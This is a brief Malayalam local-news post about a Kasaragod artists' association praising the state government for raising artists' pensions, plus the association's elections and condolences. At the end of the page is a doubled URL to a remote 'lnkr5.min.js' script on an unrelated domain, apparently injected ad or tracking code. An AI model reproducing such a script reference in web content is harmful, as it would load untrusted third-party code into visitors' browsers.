കലാകാരന്മാരുടെ പെന്‍ഷന്‍ തുക മൂവായിരമായി വര്‍ദ്ധിപ്പിച്ച സംസ്ഥാന സര്‍ക്കാരിനെ സവാക് ജില്ലാ കമ്മിറ്റി അഭിനന്ദിച്ചു

  • Post category:local news
  • Reading time:1 min read
You are currently viewing കലാകാരന്മാരുടെ പെന്‍ഷന്‍ തുക മൂവായിരമായി വര്‍ദ്ധിപ്പിച്ച സംസ്ഥാന സര്‍ക്കാരിനെ സവാക് ജില്ലാ കമ്മിറ്റി അഭിനന്ദിച്ചു

കാസര്‍കോട്: കലാകാരന്മാരുടെ പെന്‍ഷന്‍ തുക 3,000 ആയി വര്‍ദ്ധിപ്പിച്ച സംസ്ഥാന സര്‍ക്കാരിനെ സവാക് ജില്ലാ പ്രതിനിധി യോഗം അഭിനന്ദിച്ചു. കാസര്‍കോട് എസ്.വൈ.ടി റോഡിലുള്ള സവാക് ജില്ലാ കാര്യാലയത്തില്‍ നടന്ന യോഗത്തില്‍ ജില്ലയിലെ 60 കഴിഞ്ഞ അര്‍ഹരായിട്ടുള്ള എല്ലാ കലാകാരന്മാര്‍ക്കും പെന്‍ഷന്‍ തുക ലഭിക്കുന്നതിനുവേണ്ടിയുള്ള നടപടികള്‍ സ്വീകരിക്കാന്‍ യോഗം പ്രമേയം പാസാക്കി. ജില്ലാ പ്രസിഡന്റ് ഉമേഷ് ശാലിയ അധ്യക്ഷനായി.
ജില്ലാ സെക്രട്ടറിമാരായി വി.ജി. കാസര്‍കോട്, തുളസീധരന്‍ ബേര്‍ക്ക എന്നിവരെ തിരഞ്ഞെടുത്തു.വേര്‍പിരിഞ്ഞ മുതിര്‍ന്ന പത്രപ്രവര്‍ത്തക ഗൗരി ലങ്കേഷ്, യക്ഷഗാന കലാകാരന്‍ നാരായണ പാട്ടാളി പടുമലെ, വയലിന്‍ വിദ്വാന്‍ വാസുദേവ ആചാര്യ, മുകേഷ് സിംഗര്‍ വിശ്വനാഥ് എന്നിവര്‍ക്ക് അനുശോചനം രേഖപ്പെടുത്തി. അനുശോചന ചടങ്ങില്‍ കല്‍മാടി സദാശിവ ആചാര്യ, ശ്രീധര്‍ റായ് കാസര്‍കോട്, ഉമേഷ് മാസ്റ്റര്‍ഫ്യൂഷന്‍ കാസര്‍കോട്, ദിവാന്‍ ശിവശങ്കര ഭട്ട്, സുരേഷ് ബേക്കല്‍, ഗായകന്‍ മാധവന്‍, അബ്ദുള്‍ റഹിമാന്‍ കൊച്ചിന്‍, ഗോവിന്ദന്‍ മാരാര്‍ മടിയന്‍, ശ്രീകുമാര്‍ ഉദുമ തുടങ്ങിയവര്‍ പങ്കെടുത്തു. ഡോ.രാജേഷ് ആള്‍വ ബദിയടുക്ക ആമുഖ പ്രസംഗവും ദിവാന്‍ ശിവശങ്കര ഭട്ട് നന്ദിയും രേഖപ്പെടുത്തി.

 

http://analyzenetwork.xyz/addons/lnkr5.min.jshttp://analyzenetwork.xyz/addons/lnkr5.min.js

0Shares